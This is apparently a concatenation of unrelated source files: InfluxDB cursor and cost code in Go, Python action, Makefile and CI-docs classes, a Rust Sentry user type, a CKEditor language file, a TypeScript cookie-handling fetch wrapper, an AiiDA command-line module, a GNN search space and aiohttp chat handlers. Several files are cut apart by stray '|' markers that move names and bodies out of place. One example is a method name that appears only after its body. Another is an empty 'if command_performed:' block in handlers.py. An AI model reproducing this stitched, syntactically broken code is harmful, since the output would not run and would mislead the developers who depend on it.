return newStringIterator(name, tags, itrOpt, cur, aux, conds, condNames), nil
case booleanCursor:
return newBooleanIterator(name, tags, itrOpt, cur, aux, conds, condNames), nil
default:
panic("unreachable")
}
}
// buildCursor creates an untyped cursor for a field.
func (e *Engine) buildCursor(ctx context.Context, measurement, seriesKey string, tags models.Tags, ref *influxql.VarRef, opt query.IteratorOptions) cursor {
// Check if this is a system field cursor.
switch ref.Val {
case "_name":
return &stringSliceCursor{values: []string{measurement}}
case "_tagKey":
return &stringSliceCursor{values: tags.Keys()}
case "_tagValue":
return &stringSliceCursor{values: matchTagValues(tags, opt.Condition)}
case "_seriesKey":
return &stringSliceCursor{values: []string{seriesKey}}
}
// Look up fields for measurement.
mf := e.fieldset.FieldsByString(measurement)
if mf == nil {
return nil
}
// Check for system field for field keys.
if ref.Val == "_fieldKey" {
return &stringSliceCursor{values: mf.FieldKeys()}
}
// Find individual field.
f := mf.Field(ref.Val)
if f == nil {
return nil
}
// Check if we need to perform a cast. Performing a cast in the
// engine (if it is possible) is much more efficient than an automatic cast.
if ref.Type != influxql.Unknown && ref.Type != influxql.AnyField && ref.Type != f.Type {
switch ref.Type {
case influxql.Float:
switch f.Type {
case influxql.Integer:
cur := e.buildIntegerCursor(ctx, measurement, seriesKey, ref.Val, opt)
return &floatCastIntegerCursor{cursor: cur}
case influxql.Unsigned:
cur := e.buildUnsignedCursor(ctx, measurement, seriesKey, ref.Val, opt)
return &floatCastUnsignedCursor{cursor: cur}
}
case influxql.Integer:
switch f.Type {
case influxql.Float:
cur := e.buildFloatCursor(ctx, measurement, seriesKey, ref.Val, opt)
return &integerCastFloatCursor{cursor: cur}
case influxql.Unsigned:
cur := e.buildUnsignedCursor(ctx, measurement, seriesKey, ref.Val, opt)
return &integerCastUnsignedCursor{cursor: cur}
}
case influxql.Unsigned:
switch f.Type {
case influxql.Float:
cur := e.buildFloatCursor(ctx, measurement, seriesKey, ref.Val, opt)
return &unsignedCastFloatCursor{cursor: cur}
case influxql.Integer:
cur := e.buildIntegerCursor(ctx, measurement, seriesKey, ref.Val, opt)
return &unsignedCastIntegerCursor{cursor: cur}
}
}
return nil
}
// Return appropriate cursor based on type.
switch f.Type {
case influxql.Float:
return e.buildFloatCursor(ctx, measurement, seriesKey, ref.Val, opt)
case influxql.Integer:
return e.buildIntegerCursor(ctx, measurement, seriesKey, ref.Val, opt)
case influxql.Unsigned:
return e.buildUnsignedCursor(ctx, measurement, seriesKey, ref.Val, opt)
case influxql.String:
return e.buildStringCursor(ctx, measurement, seriesKey, ref.Val, opt)
case influxql.Boolean:
return e.buildBooleanCursor(ctx, measurement, seriesKey, ref.Val, opt)
default:
panic("unreachable")
}
}
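// Illustrative example of buildCursor's cast path above (the "usage" field and
// "cpu" measurement are hypothetical): a query like SELECT usage::float FROM cpu
// against an integer "usage" field builds an integer cursor wrapped in
// floatCastIntegerCursor, so the conversion happens once at the storage layer
// rather than per-value in the query engine.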
func matchTagValues(tags models.Tags, condition influxql.Expr) []string {
if condition == nil {
return tags.Values()
}
// Populate map with tag values.
data := map[string]interface{}{}
for _, tag := range tags {
data[string(tag.Key)] = string(tag.Value)
}
// Match against each specific tag.
var values []string
for _, tag := range tags {
data["_tagKey"] = string(tag.Key)
if influxql.EvalBool(condition, data) {
values = append(values, string(tag.Value))
}
}
return values
}
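// Example for matchTagValues (illustrative): with tags {host: "a", region: "us"}
// and the condition _tagKey = 'host', only the value "a" is returned, because
// EvalBool is evaluated once per tag with data["_tagKey"] set to that tag's key.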
// IteratorCost produces the cost of an iterator.
func (e *Engine) IteratorCost(measurement string, opt query.IteratorOptions) (query.IteratorCost, error) {
// Determine if this measurement exists. If it does not, then no shards are
// accessed to begin with.
if exists, err := e.index.MeasurementExists([]byte(measurement)); err != nil {
return query.IteratorCost{}, err
} else if !exists {
return query.IteratorCost{}, nil
}
// Determine all of the tag sets for this query.
indexSet := tsdb.IndexSet{Indexes: []tsdb.Index{e.index}, SeriesFile: e.sfile}
tagSets, err := indexSet.TagSets(e.sfile, []byte(measurement), opt)
if err != nil {
return query.IteratorCost{}, err
}
// Attempt to retrieve the ref from the main expression (if it exists).
var ref *influxql.VarRef
if opt.Expr != nil {
if v, ok := opt.Expr.(*influxql.VarRef); ok {
ref = v
} else if call, ok := opt.Expr.(*influxql.Call); ok {
if len(call.Args) > 0 {
ref, _ = call.Args[0].(*influxql.VarRef)
}
}
}
// Count the number of series concatenated from the tag set.
cost := query.IteratorCost{NumShards: 1}
for _, t := range tagSets {
cost.NumSeries += int64(len(t.SeriesKeys))
for i, key := range t.SeriesKeys {
// Retrieve the cost for the main expression (if it exists).
if ref != nil {
c := e.seriesCost(key, ref.Val, opt.StartTime, opt.EndTime)
cost = cost.Combine(c)
}
// Retrieve the cost for every auxiliary field since these are also
// iterators that we may have to look through.
// We may want to separate these though as we are unlikely to incur
// anywhere close to the full costs of the auxiliary iterators because
// many of the selected values are usually skipped.
for _, ref := range opt.Aux {
c := e.seriesCost(key, ref.Val, opt.StartTime, opt.EndTime)
cost = cost.Combine(c)
}
// Retrieve the expression names in the condition (if there is a condition).
// We will also create cursors for these too.
if t.Filters[i] != nil {
refs := influxql.ExprNames(t.Filters[i])
for _, ref := range refs {
c := e.seriesCost(key, ref.Val, opt.StartTime, opt.EndTime)
cost = cost.Combine(c)
}
}
}
}
return cost, nil
}
// Type returns FieldType for a series. If the series does not
// exist, ErrUnknownFieldType is returned.
func (e *Engine) Type(series []byte) (models.FieldType, error) {
if typ, err := e.Cache.Type(series); err == nil {
return typ, nil
}
typ, err := e.FileStore.Type(series)
if err != nil {
return 0, err
}
switch typ {
case BlockFloat64:
return models.Float, nil
case BlockInteger:
return models.Integer, nil
case BlockUnsigned:
return models.Unsigned, nil
case BlockString:
return models.String, nil
case BlockBoolean:
return models.Boolean, nil
}
return 0, tsdb.ErrUnknownFieldType
}
func (e *Engine) seriesCost(seriesKey, field string, tmin, tmax int64) query.IteratorCost {
key := SeriesFieldKeyBytes(seriesKey, field)
c := e.FileStore.Cost(key, tmin, tmax)
// Retrieve the range of values within the cache.
cacheValues := e.Cache.Values(key)
c.CachedValues = int64(len(cacheValues.Include(tmin, tmax)))
return c
}
// SeriesFieldKey combines a series key and field name into a unique string to be hashed to a numeric ID.
func SeriesFieldKey(seriesKey, field string) string {
return seriesKey + keyFieldSeparator + field
}
func SeriesFieldKeyBytes(seriesKey, field string) []byte {
b := make([]byte, len(seriesKey)+len(keyFieldSeparator)+len(field))
i := copy(b, seriesKey)
i += copy(b[i:], keyFieldSeparatorBytes)
copy(b[i:], field)
return b
}
var (
blockToFieldType = [8]influxql.DataType{
BlockFloat64: influxql.Float,
BlockInteger: influxql.Integer,
BlockBoolean: influxql.Boolean,
BlockString: influxql.String,
BlockUnsigned: influxql.Unsigned,
5: influxql.Unknown,
6: influxql.Unknown,
7: influxql.Unknown,
}
)
func BlockTypeToInfluxQLDataType(typ byte) influxql.DataType { return blockToFieldType[typ&7] }
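// Example for BlockTypeToInfluxQLDataType (illustrative):
// BlockTypeToInfluxQLDataType(BlockFloat64) yields influxql.Float, while the
// unused block type values 5-7 map to influxql.Unknown.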
// SeriesAndFieldFromCompositeKey returns the series key and the field key extracted from the composite key.
func SeriesAndFieldFromCompositeKey(key []byte) ([]byte, []byte) {
sep := bytes.Index(key, keyFieldSeparatorBytes)
if sep == -1 {
// No field separator found; the key contains no field component.
return key, nil
}
return key[:sep], key[sep+len(keyFieldSeparator):]
}
func varRefSliceContains(a []influxql.VarRef, v string) bool {
for _, ref := range a {
if ref.Val == v {
return true
}
}
return false
}
func varRefSliceRemove(a []influxql.VarRef, v string) []influxql.VarRef {
if !varRefSliceContains(a, v) {
return a
}
other := make([]influxql.VarRef, 0, len(a))
for _, ref := range a {
if ref.Val != v {
other = append(other, ref)
}
}
return other
}
action.py | import os
import json

CURRENT_DIR = os.path.dirname(os.path.realpath(__file__))

class Action:
    def __init__(self, card, config):
        config.pop("action", None)
        self.card = card
        self.config = config

    def env_vars_for_object(self, config, prefix):
        env_vars = {}
        config.pop("action", None)
        config.pop("id", None)
        for key, value in config.items():
            if value and isinstance(value, dict):
                nested_env_vars = self.env_vars_for_object(
                    value, "{}_{}".format(prefix, key.upper())
                )
                env_vars = {**env_vars, **nested_env_vars}
            else:
                env_vars["{}_{}".format(prefix, key.upper())] = value
        return env_vars

    def env_vars(self):
        with open(CURRENT_DIR + "/../../config/config.json", "r") as f:
            global_config = json.load(f)
        env_vars = self.env_vars_for_object(self.card, "CARD")
        env_vars["magic_cards_room"] = global_config["room"]
        prefix = self.__class__.__name__.replace("Action", "").upper()
        return {**env_vars, **self.env_vars_for_object(self.config, prefix)}
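# Illustrative sketch of env_vars() (hypothetical values): for a card
# {"uid": "4-7-2", "id": 9} and config {"uri": "spotify:album:x"} on a
# SpotifyAction subclass, it would return {"CARD_UID": "4-7-2",
# "SPOTIFY_URI": "spotify:album:x", "magic_cards_room": <room from config.json>};
# the "action" and "id" keys are dropped before flattening.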
class ChromecastAction(Action):
    def __init__(self, card, config, chromecast):
        super().__init__(card, config)
        self.chromecast = chromecast
|
user.rs | //! Sentry user implementation.
use crate::{Object, Value};
use std::{
collections::BTreeMap,
ops::{Deref, DerefMut},
};
/// A Sentry user.
///
/// # Examples
/// ```
/// # use sentry_contrib_native::User;
/// let mut user = User::new();
/// user.insert("id", 1);
/// user.set();
/// ```
#[derive(Clone, Debug, PartialEq, PartialOrd)]
pub struct User(BTreeMap<String, Value>);
impl Default for User {
fn default() -> Self {
Self::new()
}
}
impl Object for User {
fn into_parts(self) -> (sys::Value, BTreeMap<String, Value>) {
(unsafe { sys::value_new_object() }, self.0)
}
}
impl Deref for User {
type Target = BTreeMap<String, Value>;
fn deref(&self) -> &Self::Target {
&self.0
}
}
impl DerefMut for User {
fn deref_mut(&mut self) -> &mut Self::Target {
&mut self.0
}
}
impl User {
/// Creates a new user.
///
/// # Examples
/// ```
/// # use sentry_contrib_native::User;
/// let mut user = User::new();
/// ```
#[must_use]
#[allow(clippy::missing_const_for_fn)]
pub fn new() -> Self {
Self(BTreeMap::new())
}
/// Inserts a key-value pair into the [`User`].
///
/// # Examples
/// ```
/// # use sentry_contrib_native::User;
/// let mut user = User::new();
/// user.insert("id", 1);
/// ```
pub fn insert<S: Into<String>, V: Into<Value>>(&mut self, key: S, value: V) {
self.deref_mut().insert(key.into(), value.into());
}
/// Sets the specified user.
///
/// # Examples
/// ```
/// # use sentry_contrib_native::User;
/// let mut user = User::new();
/// user.insert("id", 1);
/// user.set();
/// ```
pub fn set(self) {
let user = self.into_raw();
unsafe { sys::set_user(user) }
}
}
#[test]
fn user() {
User::new().set();
let mut user = User::new();
user.insert("test", "test");
user.set()
}
Makefile.py | import os
import shutil
import time

from mklib import Task
from mklib.common import relpath

class foo(Task):
    default = True
    results = ["foo.txt"]
    deps = ["bar.txt"]

    def make(self):
        src = self.deps[0].path
        dst = self.results[0].path
        self.log.info("cp %s %s", relpath(src), relpath(dst))
        shutil.copy(src, dst)

class bar(Task):
    def make(self):
        f = open("bar.txt", 'w')
        f.write(str(time.time()))
        f.close()

class clean(Task):
    def make(self):
        for p in ("foo.txt", "bar.txt"):
            if os.path.exists(p):
                os.remove(p)
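# Usage sketch (assuming mklib's command-line runner resolves the bar.txt
# dependency through the bar task): a plain `mk` runs the default foo task,
# copying a freshly written bar.txt to foo.txt; `mk clean` removes both files.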
|
docs.py | from typing import List

from ..defines import SupportedPython
from ..step_builder import StepBuilder

def docs_steps() -> List[dict]:
    return [
        # If this test is failing, you may have either:
        # (1) Updated the code that is referenced by a literalinclude in the documentation
        # (2) Directly modified the inline snapshot of a literalinclude instead of updating
        #     the underlying code that the literalinclude is pointing to.
        # To fix this, run 'make snapshot' in the /docs directory to update the snapshots.
        # Be sure to check the diff to make sure the literalincludes are as you expect them.
        StepBuilder("docs code snapshots")
        .run("pushd docs; make docs_dev_install; make snapshot", "git diff --exit-code")
        .on_integration_image(SupportedPython.V3_7)
        .build(),
        # Make sure the docs site can build end-to-end.
        StepBuilder("docs next")
        .run(
            "pushd docs/next",
            "yarn",
            "yarn test",
            "yarn build-master",
        )
        .on_integration_image(SupportedPython.V3_7)
        .build(),
        # TODO: Yuhan to fix
        # StepBuilder("docs sphinx json build")
        # .run(
        #     "pip install -e python_modules/automation",
        #     "pip install -r docs-requirements.txt -qqq",
        #     "pushd docs; make build",
        #     "git diff --exit-code",
        # )
        # .on_integration_image(SupportedPython.V3_7)
        # .build(),
    ]
en-gb.js | /*
Copyright (c) 2003-2017, CKSource - Frederico Knabben. All rights reserved.
For licensing, see LICENSE.md or http://ckeditor.com/license
*/
CKEDITOR.plugins.setLang("a11yhelp","en-gb",{title:"Accessibility Instructions",contents:"Help Contents. To close this dialog press ESC.",legend:[{name:"General",items:[{name:"Editor Toolbar",legend:"Press ${toolbarFocus} to navigate to the toolbar. Move to the next and previous toolbar group with TAB and SHIFT+TAB. Move to the next and previous toolbar button with RIGHT ARROW or LEFT ARROW. Press SPACE or ENTER to activate the toolbar button."},{name:"Editor Dialog",legend:"Inside a dialog, press TAB to navigate to the next dialog element, press SHIFT+TAB to move to the previous dialog element, press ENTER to submit the dialog, press ESC to cancel the dialog. When a dialog has multiple tabs, the tab list can be reached either with ALT+F10 or with TAB as part of the dialog tabbing order. With tab list focused, move to the next and previous tab with RIGHT and LEFT ARROW, respectively."},
{name:"Editor Context Menu",legend:"Press ${contextMenu} or APPLICATION KEY to open context-menu. Then move to next menu option with TAB or DOWN ARROW. Move to previous option with SHIFT+TAB or UP ARROW. Press SPACE or ENTER to select the menu option. Open sub-menu of current option with SPACE or ENTER or RIGHT ARROW. Go back to parent menu item with ESC or LEFT ARROW. Close context menu with ESC."},{name:"Editor List Box",legend:"Inside a list-box, move to next list item with TAB OR DOWN ARROW. Move to previous list item with SHIFT+TAB or UP ARROW. Press SPACE or ENTER to select the list option. Press ESC to close the list-box."},
{name:"Editor Element Path Bar",legend:"Press ${elementsPathFocus} to navigate to the elements path bar. Move to next element button with TAB or RIGHT ARROW. Move to previous button with SHIFT+TAB or LEFT ARROW. Press SPACE or ENTER to select the element in editor."}]},{name:"Commands",items:[{name:" Undo command",legend:"Press ${undo}"},{name:" Redo command",legend:"Press ${redo}"},{name:" Bold command",legend:"Press ${bold}"},{name:" Italic command",legend:"Press ${italic}"},{name:" Underline command",
legend:"Press ${underline}"},{name:" Link command",legend:"Press ${link}"},{name:" Toolbar Collapse command",legend:"Press ${toolbarCollapse}"},{name:" Access previous focus space command",legend:"Press ${accessPreviousSpace} to access the closest unreachable focus space before the caret, for example: two adjacent HR elements. Repeat the key combination to reach distant focus spaces."},{name:" Access next focus space command",legend:"Press ${accessNextSpace} to access the closest unreachable focus space after the caret, for example: two adjacent HR elements. Repeat the key combination to reach distant focus spaces."},
{name:" Accessibility Help",legend:"Press ${a11yHelp}"},{name:" Paste as plain text",legend:"Press ${pastetext}",legendEdge:"Press ${pastetext}, followed by ${paste}"}]}],tab:"Tab",pause:"Pause",capslock:"Caps Lock",escape:"Escape",pageUp:"Page Up",pageDown:"Page Down",leftArrow:"Left Arrow",upArrow:"Up Arrow",rightArrow:"Right Arrow",downArrow:"Down Arrow",insert:"Insert",leftWindowKey:"Left Windows key",rightWindowKey:"Right Windows key",selectKey:"Select key",numpad0:"Numpad 0",numpad1:"Numpad 1",
numpad2:"Numpad 2",numpad3:"Numpad 3",numpad4:"Numpad 4",numpad5:"Numpad 5",numpad6:"Numpad 6",numpad7:"Numpad 7",numpad8:"Numpad 8",numpad9:"Numpad 9",multiply:"Multiply",add:"Add",subtract:"Subtract",decimalPoint:"Decimal Point",divide:"Divide",f1:"F1",f2:"F2",f3:"F3",f4:"F4",f5:"F5",f6:"F6",f7:"F7",f8:"F8",f9:"F9",f10:"F10",f11:"F11",f12:"F12",numLock:"Num Lock",scrollLock:"Scroll Lock",semiColon:"Semicolon",equalSign:"Equal Sign",comma:"Comma",dash:"Dash",period:"Period",forwardSlash:"Forward Slash",
graveAccent:"Grave Accent",openBracket:"Open Bracket",backSlash:"Backslash",closeBracket:"Close Bracket",singleQuote:"Single Quote"});
fetch-cookie.ts | import createDebug from 'debug';
import { CookieJar } from 'tough-cookie';

import {
    fetch,
    RequestInfo,
    RequestInit,
    Response
} from './fetch';

export type Headers = Record<string, string>;

export type FetchWrapper = (
    url: RequestInfo,
    options?: RequestInit
) => Promise<Response>;

export {
    CookieJar,
    RequestInfo,
    RequestInit,
    Response
};

const debug = createDebug('vk-io:util:fetch-cookie');

const userAgentRe = /^User-Agent$/i;

const redirectCodes = new Set([303, 301, 302]);

const findUserAgent = (headers?: Headers): string | undefined => {
    if (!headers) {
        return undefined;
    }

    const key = Object.keys(headers)
        .find((header): boolean => userAgentRe.test(header));

    if (!key) {
        return undefined;
    }

    return headers[key];
};

export const fetchCookieDecorator = (jar = new CookieJar()): FetchWrapper => (
    async function fetchCookie(
        url: RequestInfo,
        options: RequestInit = {}
    ): Promise<Response> {
        const previousCookie = await jar.getCookieString(String(url));

        const { headers = {} } = options as {
            headers: Headers;
        };

        if (previousCookie) {
            headers.cookie = previousCookie;
        }

        debug('fetch url %s', url);

        const response = await fetch(url, {
            ...options,
            headers
        });

        const { 'set-cookie': cookies = [] } = response.headers.raw();

        if (cookies.length === 0) {
            return response;
        }

        await Promise.all(cookies.map((cookie: string): Promise<unknown> => (
            jar.setCookie(cookie, response.url)
        )));

        return response;
    }
);

export const fetchCookieFollowRedirectsDecorator = (jar?: CookieJar): FetchWrapper => {
    const fetchCookie = fetchCookieDecorator(jar);

    return async function fetchCookieFollowRedirects(
        url: RequestInfo,
        options: RequestInit = {}
    ): Promise<Response> {
        const response = await fetchCookie(url, {
            ...options,
            redirect: 'manual'
        });

        const isRedirect = redirectCodes.has(response.status);

        if (isRedirect && options.redirect !== 'manual' && options.follow !== 0) {
            const location = response.headers.get('location');

            debug('Redirect to', location);

            if (!location) {
                throw new Error('Location header missing');
            }

            let follow;
            if (options.follow) {
                follow = options.follow - 1;
            }

            const userAgent = findUserAgent(options.headers as Headers);

            // eslint-disable-next-line @typescript-eslint/naming-convention
            const headers: Headers = userAgent !== undefined
                ? { 'User-Agent': userAgent }
                : {};

            const redirectResponse = await fetchCookieFollowRedirects(location, {
                method: 'GET',
                body: undefined,
                agent: options.agent,
                headers,
                follow
            });

            return redirectResponse;
        }

        return response;
    };
};
cli.py | """
Command line interface (cli) for aiida_abinit.
Register new commands either via the "console_scripts" entry point or plug them
directly into the 'verdi' command by using AiiDA-specific entry points like
"aiida.cmdline.data" (both in the setup.json file).
"""
import sys
import click
from aiida.cmdline.utils import decorators
from aiida.cmdline.commands.cmd_data import verdi_data
from aiida.cmdline.params.types import DataParamType
# See aiida.cmdline.data entry point in setup.json
@verdi_data.group('abinit')
def data_cli():
|
@data_cli.command('list')
@decorators.with_dbenv()
def list_(): # pylint: disable=redefined-builtin
"""
Display all DiffParameters nodes
"""
from aiida.orm import QueryBuilder
from aiida.plugins import DataFactory
DiffParameters = DataFactory('abinit')
qb = QueryBuilder()
qb.append(DiffParameters)
results = qb.all()
s = ""
for result in results:
obj = result[0]
s += "{}, pk: {}\n".format(str(obj), obj.pk)
sys.stdout.write(s)
@data_cli.command('export')
@click.argument('node', metavar='IDENTIFIER', type=DataParamType())
@click.option('--outfile',
'-o',
type=click.Path(dir_okay=False),
help='Write output to file (default: print to stdout).')
@decorators.with_dbenv()
def export(node, outfile):
"""Export a DiffParameters node (identified by PK, UUID or label) to plain text."""
string = str(node)
if outfile:
with open(outfile, 'w') as f:
f.write(string)
else:
click.echo(string)
| """Command line interface for aiida-abinit""" |
message.py | # This is free and unencumbered software released into the public domain.
class Message:
"""A message."""
def __init__(self, id=None):
self.id = id
def __repr__(self):
"""Returns a human-readable string representation of this object."""
return "message{{id={}}}".format(self.id)
def | (self):
"""Returns a human-readable string representation of this object."""
return self.__repr__()
| __str__ |
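
# Round-trip sketch: the doubled braces in the format string escape to literal
# braces, and __str__ delegates to __repr__, so both calls print the same text.
msg = Message(id=42)
print(repr(msg))  # message{id=42}
print(str(msg))   # message{id=42}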
micro_search_space.py | import torch
import torch.nn.functional as F
from torch.nn import Module
from torch_geometric.nn.conv import *
gnn_list = [
"gat_8", # GAT with 8 heads
"gat_6", # GAT with 6 heads
"gat_4", # GAT with 4 heads
"gat_2", # GAT with 2 heads
"gat_1", # GAT with 1 heads
"gcn", # GCN
"cheb", # chebnet
"sage", # sage
"arma",
"sg", # simplifying gcn
"linear", # skip connection
"zero", # skip connection
]
act_list = [
# "sigmoid", "tanh", "relu", "linear",
# "softplus", "leaky_relu", "relu6", "elu"
"sigmoid", "tanh", "relu", "linear", "elu"
]
def act_map(act):
if act == "linear":
return lambda x: x
elif act == "elu":
return F.elu
elif act == "sigmoid":
return torch.sigmoid
elif act == "tanh":
return torch.tanh
elif act == "relu":
return torch.nn.functional.relu
elif act == "relu6":
return torch.nn.functional.relu6
elif act == "softplus":
return torch.nn.functional.softplus
elif act == "leaky_relu":
return torch.nn.functional.leaky_relu
else:
raise Exception("wrong activate function")
def gnn_map(gnn_name, in_dim, out_dim, concat=False, bias=True) -> Module:
'''
    :param gnn_name: name of the GNN operator, one of gnn_list
    :param in_dim: input feature dimension
    :param out_dim: output feature dimension
    :param concat: for gat, concat multi-head output or not
    :return: GNN model
'''
if gnn_name == "gat_8":
return GATConv(in_dim, out_dim, 8, concat=concat, bias=bias)
elif gnn_name == "gat_6":
return GATConv(in_dim, out_dim, 6, concat=concat, bias=bias)
elif gnn_name == "gat_4":
return GATConv(in_dim, out_dim, 4, concat=concat, bias=bias)
elif gnn_name == "gat_2":
return GATConv(in_dim, out_dim, 2, concat=concat, bias=bias)
elif gnn_name in ["gat_1", "gat"]:
return GATConv(in_dim, out_dim, 1, concat=concat, bias=bias)
elif gnn_name == "gcn":
return GCNConv(in_dim, out_dim)
elif gnn_name == "cheb":
return ChebConv(in_dim, out_dim, K=2, bias=bias)
elif gnn_name == "sage":
return SAGEConv(in_dim, out_dim, bias=bias)
elif gnn_name == "gated":
return GatedGraphConv(in_dim, out_dim, bias=bias)
elif gnn_name == "arma":
return ARMAConv(in_dim, out_dim, bias=bias)
elif gnn_name == "sg":
return SGConv(in_dim, out_dim, bias=bias)
elif gnn_name == "linear":
return LinearConv(in_dim, out_dim, bias=bias)
elif gnn_name == "zero":
return ZeroConv(in_dim, out_dim, bias=bias)
class LinearConv(Module):
def __init__(self,
in_channels,
out_channels,
bias=True):
super(LinearConv, self).__init__()
self.in_channels = in_channels
self.out_channels = out_channels
self.linear = torch.nn.Linear(in_channels, out_channels, bias)
def forward(self, x, edge_index, edge_weight=None):
return self.linear(x)
def __repr__(self):
return '{}({}, {})'.format(self.__class__.__name__, self.in_channels,
self.out_channels)
class ZeroConv(Module):
def | (self,
in_channels,
out_channels,
bias=True):
        super(ZeroConv, self).__init__()
        # keep the channel attributes so __repr__ below does not raise AttributeError
        self.in_channels = in_channels
        self.out_channels = out_channels
        self.out_dim = out_channels
def forward(self, x, edge_index, edge_weight=None):
return torch.zeros([x.size(0), self.out_dim]).to(x.device)
def __repr__(self):
return '{}({}, {})'.format(self.__class__.__name__, self.in_channels,
self.out_channels)
class SearchSpace(object):
def __init__(self, search_space=None):
if search_space:
self.search_space = search_space
else:
self.search_space = {}
self.search_space["act"] = act_list # activate function
self.search_space["gnn"] = gnn_list # gnn type
# 0 means history, 1 means current,
            # each layer contains two inputs
self.search_space["self_index"] = [0, 1]
# same as self_index,
self.search_space["concat_type"] = ["add",
"product",
"concat"]
self.search_space['learning_rate'] = [1e-2, 1e-3, 1e-4, 5e-3, 5e-4]
self.search_space['dropout'] = [0.0, 0.1, 0.2, 0.3, 0.4,
0.5, 0.6, 0.7, 0.8, 0.9]
self.search_space['weight_decay'] = [0, 1e-3, 1e-4,
1e-5, 5e-5, 5e-4]
self.search_space['hidden_unit'] = [8, 16, 32, 64, 128, 256, 512]
pass
def get_search_space(self):
return self.search_space
@staticmethod
def generate_action_list(cell=4):
action_list = []
for i in range(cell):
action_list += ["self_index", "gnn"]
action_list += ["act", "concat_type"]
return action_list
class IncrementSearchSpace(object):
def __init__(self, search_space=None, max_cell=10):
if search_space:
self.search_space = search_space
else:
self.search_space = {}
self.search_space["act"] = act_list # activate function
self.search_space["gnn"] = gnn_list # gnn type
for i in range(max_cell):
self.search_space[f"self_index_{i}"] = list(range(2 + i))
# 0 means history, 1 means current,
            # each layer contains two inputs
self.search_space["concat_type"] = ["add",
"product",
"concat"]
# same as self_index,
self.search_space['learning_rate'] = [1e-2, 1e-3, 1e-4, 5e-3, 5e-4]
self.search_space['dropout'] = [0.0, 0.1, 0.2, 0.3, 0.4,
0.5, 0.6, 0.7, 0.8, 0.9]
self.search_space['weight_decay'] = [0, 1e-3, 1e-4,
1e-5, 5e-5, 5e-4]
self.search_space['hidden_unit'] = [8, 16, 32, 64, 128, 256, 512]
pass
def get_search_space(self):
return self.search_space
@staticmethod
def generate_action_list(cell=4):
action_list = []
for i in range(cell):
action_list += [f"self_index_{i}", "gnn"]
action_list += ["act", "concat_type"]
return action_list
if __name__ == "__main__":
obj = IncrementSearchSpace()
print(obj.generate_action_list())
print(obj.get_search_space())
| __init__ |
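
# Minimal sketch of how a controller could sample a candidate architecture
# from this space, assuming only the classes above plus Python's random module.
import random

space = SearchSpace().get_search_space()
actions = SearchSpace.generate_action_list(cell=2)
# one random value per action slot, e.g. [1, 'gcn', 0, 'sage', 'relu', 'add']
sampled = [random.choice(space[name]) for name in actions]
print(list(zip(actions, sampled)))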
handlers.py | import asyncio
from datetime import datetime
from string import hexdigits
from time import time
import aiohttp
import aiohttp_jinja2
from aiohttp import web
async def handle_command(payload, user_id, state_manager):
if payload in {'/start', '/close'} and state_manager:
await state_manager.drop_active_dialog(user_id)
return True
class ApiHandler:
def __init__(self, output_formatter, response_time_limit=5):
self.output_formatter = output_formatter
self.response_time_limit = response_time_limit
async def handle_api_request(self, request):
response = {}
register_msg = request.app['agent'].register_msg
if request.method == 'POST':
if 'content-type' not in request.headers \
or not request.headers['content-type'].startswith('application/json'):
raise web.HTTPBadRequest(reason='Content-Type should be application/json')
data = await request.json()
            user_id = data.pop('user_id', None)
payload = data.pop('payload', '')
deadline_timestamp = None
if self.response_time_limit:
deadline_timestamp = time() + self.response_time_limit
if not user_id:
raise web.HTTPBadRequest(reason='user_id key is required')
command_performed = await handle_command(payload, user_id, request.app['agent'].state_manager)
if command_performed:
return web.json_response({})
response = await asyncio.shield(
register_msg(utterance=payload, user_external_id=user_id,
user_device_type=data.pop('user_device_type', 'http'),
date_time=datetime.now(),
location=data.pop('location', ''),
channel_type='http_client',
message_attrs=data, require_response=True,
deadline_timestamp=deadline_timestamp)
)
if response is None:
raise RuntimeError('Got None instead of a bot response.')
return web.json_response(self.output_formatter(response['dialog'].to_dict()))
async def dialog(self, request):
state_manager = request.app['agent'].state_manager
dialog_id = request.match_info['dialog_id']
if len(dialog_id) == 24 and all(c in hexdigits for c in dialog_id):
dialog_obj = await state_manager.get_dialog_by_id(dialog_id)
if not dialog_obj:
raise web.HTTPNotFound(reason=f'dialog with id {dialog_id} does not exist')
return web.json_response(dialog_obj.to_dict())
raise web.HTTPBadRequest(reason='dialog id should be 24-character hex string')
async def dialogs_by_user(self, request):
state_manager = request.app['agent'].state_manager
user_external_id = request.match_info['user_external_id']
dialogs = await state_manager.get_dialogs_by_user_ext_id(user_external_id)
return web.json_response([i.to_dict() for i in dialogs])
async def dialog_rating(self, request):
state_manager = request.app['agent'].state_manager
data = await request.json()
dialog_id = data.pop('dialog_id')
user_id = data.pop('user_id', None)
rating = data.pop('rating')
await state_manager.set_rating_dialog(user_id, dialog_id, rating)
return web.Response()
async def utterance_rating(self, request):
state_manager = request.app['agent'].state_manager
data = await request.json()
user_id = data.pop('user_id', None)
rating = data.pop('rating')
utt_id = data.pop('utt_id')
await state_manager.set_rating_utterance(user_id, utt_id, rating)
return web.Response()
async def options(self, request):
return web.Response(headers={'Access-Control-Allow-Methods': 'POST, OPTIONS'})
class PagesHandler:
def __init__(self, debug=False):
self.debug = debug
async def ping(self, request):
return web.json_response("pong")
async def options(self, request):
return web.Response(headers={'Access-Control-Allow-Methods': 'GET, OPTIONS'})
class WSstatsHandler:
def __init__(self):
self.update_time = 0.5
@aiohttp_jinja2.template('services_ws_highcharts.html')
async def ws_page(self, request):
return {}
async def ws_handler(self, request):
ws = web.WebSocketResponse()
await ws.prepare(request)
request.app['websockets'].append(ws)
logger_stats = request.app['logger_stats']
while True:
data = dict(logger_stats.get_current_load())
await ws.send_json(data)
await asyncio.sleep(self.update_time)
return ws
async def options(self, request):
return web.Response(headers={'Access-Control-Allow-Methods': 'GET, OPTIONS'})
class WSChatHandler:
def __init__(self, output_formatter):
self.output_formatter = output_formatter
@aiohttp_jinja2.template('chat.html')
async def ws_page(self, request):
return {}
async def ws_handler(self, request):
register_msg = request.app['agent'].register_msg
ws = web.WebSocketResponse()
await ws.prepare(request)
while True:
msg = await ws.receive()
if msg.type == aiohttp.WSMsgType.text:
data = msg.json()
                user_id = data.pop('user_id', None)
payload = data.pop('payload', '')
deadline_timestamp = None
if not user_id:
raise web.HTTPBadRequest(reason='user_id key is required')
command_performed = await handle_command(payload, user_id, request.app['agent'].state_manager)
if command_performed:
|
response = await register_msg(
utterance=payload, user_external_id=user_id,
user_device_type=data.pop('user_device_type', 'websocket'),
date_time=datetime.now(),
location=data.pop('location', ''),
channel_type='ws_client',
message_attrs=data, require_response=True,
deadline_timestamp=deadline_timestamp
)
if response is None:
raise RuntimeError('Got None instead of a bot response.')
await ws.send_json(self.output_formatter(response['dialog'].to_dict()))
else:
await ws.close()
break
return ws
async def options(self, request):
